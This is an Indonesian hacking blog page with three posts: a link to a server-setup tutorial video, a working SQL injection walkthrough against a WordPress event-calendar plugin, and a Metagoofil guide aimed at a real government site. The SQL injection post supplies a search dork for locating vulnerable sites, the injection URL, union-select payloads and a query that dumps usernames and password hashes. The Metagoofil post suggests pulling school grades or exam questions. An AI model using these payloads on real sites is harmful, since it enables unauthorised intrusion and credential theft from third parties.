Selasa, 31 Januari 2017

[UKOM] Tutorial Membuat DNS & Web Server di Linux UBUNTU, dan SSH REMOTE with winscp

Hello World ; Siang Fans, Please Say Hello Haters ;*
gimana kabar Lu o.O ? iya elu .-. , baik2 aja kan :)) bruakakakakk

hmm, karena ini udh memasuki persiapan Ujian Praktek utk SMK, kali ini gua bakal ReShare Video Tutorial dari Bang Initial.N ..
tadinya gua mao biarin aja si Initial.N yang posting artikel kali ini, tapi dia lagi sibuk banget wkwkw, ampe ora bisa di contact :\ *kemanasihkamoehmz

artikel ini bakal ngeReview Ujian Praktek TKJ Tahun kemarin >..< ( jujur gua lupa ini Ukom TKJ Paket berapa >3< *maafkan, tuhan menciptakan manusia ganteng dengan kekurangannya , yaitu pelupa :p )

yang Jelas gua gak tau apakah ini Materi Praktek bakal dipakai Untuk tahun2 Selanjutnya '3')/
yang jelas semoga Video Tutorial dari Bang Initial.N ini bermanfaat dan menambah wawasan/refrensi kalean adek2 TeKaJeh / para pemula penggiat IT :)


silahkan cek Tutornya di Youtube -> Tutorial Membuat DNS & Web Server di Linux UBUNTU, dan SSH REMOTE with winscp [VB]

Created & edited By: Init.N
Tutorial Membuat DNS & Web Server (Instalasi CMS Wordpress dan membuat Database) di Linux UBUNTU, dan SSH REMOTE with winscp.
maaf kalo tutornya cupuu 
enjoyed bro

*note: ini video Latihan sebelom UKOM, makanye masih di konfig di VirtualBox, kalo yang aselinya mah kita bener2 install full CLI di PC Server ^_^




Baca juga yaw :
Instalasi dan Konfigurasi WebMail di Debian 7
Tutorial Membuat DNS, DHCP, dan HTTP Server pada Cisco Packet Tracer
Cara Membuat Virtual Host (SubDomain) di Linux

Nantikan juga Video2 Tutorial di Channel baru kami: BadSector Channel

Jangan Lupa Like , Comment , and Subscribe br0~
Semoga bermanfaat ^_^

Stay Cool and Keep ./Crotz , gaes <(")

bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak.
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami: TKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')

Keep Share ~
Sekian dan semoga bermanfaat .. terimakasih

Greetz: Initial.N

./Nuenomaru


sange kok gak modal -3xBitCh





Visit and follow :

FP         : TKJ Cyber Art
G+         : TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2
Line       : http://line.me/ti/p/%40hjl8740i

Minggu, 29 Januari 2017

WordPress Plugin CP Multi View Event Calendar SQL Injection

Stay Cool and Keep ./Crotz gaes, kali ini gue 3xBitCh bakal Share Tutorial WordPress Plugin CP Multi View Event Calendar  SQL Injection.
yoii kali ini kita maen suntik2an di CMS WordPress, maaf baru update, adminnya lagi pada sibuk maen ML akwkwak.



Dork : inurl:/wp-content/plugins/cp-multi-view-calendar
(Selebihnya kebangin lg menggunakan imajinasi vokepers kalian, biar dpt yg vuln n verawan)

eXploit: 127.0.0.1/?action=data_management&cpmvc_do_action=mvparse&f=edit&id=<sql>

hackbar : disini saya menggunakan hackbar buatan sec7or, silahkan di download di sini

1. pertama silahkan cari target yang ingin di eksekusi, jika sudah menemukan target, coba dimasukan exploitnya hingga tampilan menjadi seperti berikut


2. setelah itu kita coba test urlnya dengan untuk mengecek error apa tidak
contoh :
127.0.0.1/?action=data_management&cpmvc_do_action=mvparse&f=edit&id=1


3. jika terjadi blank kemungkinan bisa di exploitasi dengan sql injection, coba kita balance dulu dengan +--+ 
contoh :
127.0.0.1/?action=data_management&cpmvc_do_action=mvparse&f=edit&id=1+--+

jika halaman tidak blank lagi, berarti balancenya bisa.
4. Sekarang kita coba hitung jumlah table yang ada dengan order by
contoh :
127.0.0.1/?action=data_management&cpmvc_do_action=mvparse&f=edit&id=1 order by 1--+


5. jika seperti gambar diatas, kita coba order by lagi

127.0.0.1/?action=data_management&cpmvc_do_action=mvparse&f=edit&id=1 order by 1--+ →no error
127.0.0.1/?action=data_management&cpmvc_do_action=mvparse&f=edit&id=1 order by 2--+ → no error
127.0.0.1/?action=data_management&cpmvc_do_action=mvparse&f=edit&id=1 order by 3--+ → no error
127.0.0.1/?action=data_management&cpmvc_do_action=mvparse&f=edit&id=1 order by 10--+ → no error
127.0.0.1/?action=data_management&cpmvc_do_action=mvparse&f=edit&id=1 order by 15--+ → error

gotcha, error juga akwkwa
6. karna saat kita order by 15 terjadi eror, dan di coba order by 14 tidak error,berarti jumlah table nya adalah 14.

sekarang kita coba cari angka ajaibnya dengan menggunakan union select
contoh :
127.0.0.1/?action=data_management&cpmvc_do_action=mvparse&f=edit&id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14--+


7. nah angka ajaibnya adalah 5,6 dan 10

sekarang kita exploitasi menggunakan DIOS nya mas madblood
contoh :
http://127.0.0.1/?action=data_management&cpmvc_do_action=mvparse&f=edit&id=-1 union select 1,2,3,4,concat(0x696e6a6563742062792033786269746368),6,7,8,9,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),11,12,13,14--+


8. dan boom~
Sekarang kita tinggal cari table usernya.
Jika sudah ketemu kita dump deh

contoh :
http://127.0.0.1/?action=data_management&cpmvc_do_action=mvparse&f=edit&id=-1 union select 1,2,3,4,concat(0x696e6a6563742062792033786269746368),6,7,8,9,group_concat(user_login,0x3a,user_pass),11,12,13,14+from+wp_final_users--+


nah muncul kan tuh?
abis  ini seterah ente mau diapain, Baca juga Joomla Easy Youtube Gallery 1.0.2 SQL Injection Vulnerability

Like, Comment, and Subscribe Channel Baru Kami: BadSector Channel

Oke sekian tutorial cupu dari saya :)

3xBitCh






Visit and follow :

FP         : TKJ Cyber Art
G+         : TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2
Line       : http://line.me/ti/p/%40hjl8740i

Rabu, 18 Januari 2017

Cara Mendapatkan Dokumen di suatu Website dengan Metagoofil

Editing By: Yiyop[s]
Hello World ; Siang Fans, Please Say Hello Haters ;*
Haii kamu, iya kamu ,, Kamu yang masih dipisahkan oleh Jarak , Restu, dan Agama :') *maaf blm bisa nepatin janji* #ngaur wkwkw

niatnya sih ini artikel bakal gua Ketik besok, tapi baru inget, bsk kudu ke Pengadilan JakSel x'D *catch me if you can :p
yaudeh deh jadinye gua putuskan utk nulisnye sekarang bae, kali ini gua bakal Share Tutorial Cara Mendapatkan Dokumen dan File di suatu Website dengan Metagoofil di Linux .

btw apasih tool Metagoofil o.O ? silahkan selancar digoogle :p

ini adalah salah satu tool Information Gathering *pengumpulan data*
cocok utk Lu Mahasiswa/ anak sekolah ingusan, yang lagi butuh banyak Refrensi untuk Buat Skripsi, Makalah, atau kliping.
yang pasti pada artikel kali ini, kita cuma bakal membahas Salah Satu Fungsi dari Tool ini xP wkkwkw

Let's Fight Ghost

1. Buka terminal di kali linux anda lalu ketikan perintah :

metagoofil -h

Help: utk melihat perintah2 dan fungsi pada tool ini
jika command not found attau perintah tidak di temukan bisa di install dulu metagoofil Nya dengan perintah :

apt-get install metagoofil
kalo masih gk bisa berarti kali linux anda belum ada repositoryNya, silahkan kunjungi artikel kami -> List Repository beberapa Distro Linux

2. lalu siapkan website yang ingin Lu kepoin isi dokumenNya, kalo disini gua make contoh target :
www.indonesia.go.id  8| *sorry pak, hanya Edukasi utk adek2 pencinta OpenSource :p *

jika sudah, ketikan perintah seperti berikut :

metagoofil -d http://indonesia.go.id -t pdf,doc,xls,ppt,odp,ods,docx,xlsx,pptx -l 300 -n 50 -o indonesia -f index.html


Penjelasan:

-t : jenis file
-l : batas pencarian
-o : tempat folder menyimpan dokumen hasil kepo
-f : file laporan metagoofil
- http://indonesia.go.id: target (sesuaikan dgn target Lu)
- tempat folder menyimpan hasil, bisa lu ganti sesuka Lu *kalo disini gua make nama indonesia, biar keliatan nasionalisme aja sih :'v*

lalu akan tampak seperti ini , dan tunggu hingga prosessNya selesai :


noh, si tool lagi beraksi, nyedot2in file2 di web target

Kalo udah Kelar buka folder yang agan buat untuk menyimpan tadi (kalo gua folder "indonesia")

lihaaatt ,, daaann wooottsss :3
eits.. ada yang tertinggal yaitu laporan dari metagoofile yang tadi gua beri nama index.html pada directory "/home" , buka fileNya dan mantaps..

siap ndan, laporan kami terima ;*
btw agan bisa memanfaatkanNya untuk meilhat nilai sekolah atau soal2 di website sekolah, *tergantung webmasternye sih awkwak* #jdijanngarep

Udeh cukup Kaafiiirr belom o.O ?? sebelomnye ye bang , gua saranin bagi elu yang lg terkena Flu Onta, jan coba2 ini tool, kalo lu belom tau yang buat dari agama mane :v :v awas nanti auto kapir mz :v pffftt bruakakakakakakkakakakakk *aselingakakajg

Untuk selebihnyee silahkan eXplore sendiri ya kegunaan dan manfaat ini tool, yang pasti silahkan coba di Distro2 Linux kesayangan anda :p

Stay Cool and Keep ./Crotz , gaes <(")

bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak.
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami: TKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')
Happy Information Gathering ~
Sekian dan semoga bermanfaat .. terimakasih


source and thanks to: With Out Shadow

./Nuenomaru

kalo agama dapat memisahkan ? kenapa tuhan menciptakannya






Visit and follow :

FP         : TKJ Cyber Art
G+         : TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2
Line       : http://line.me/ti/p/%40hjl8740i

 

ande ande lumoet Template by Ipietoon Cute Blog Design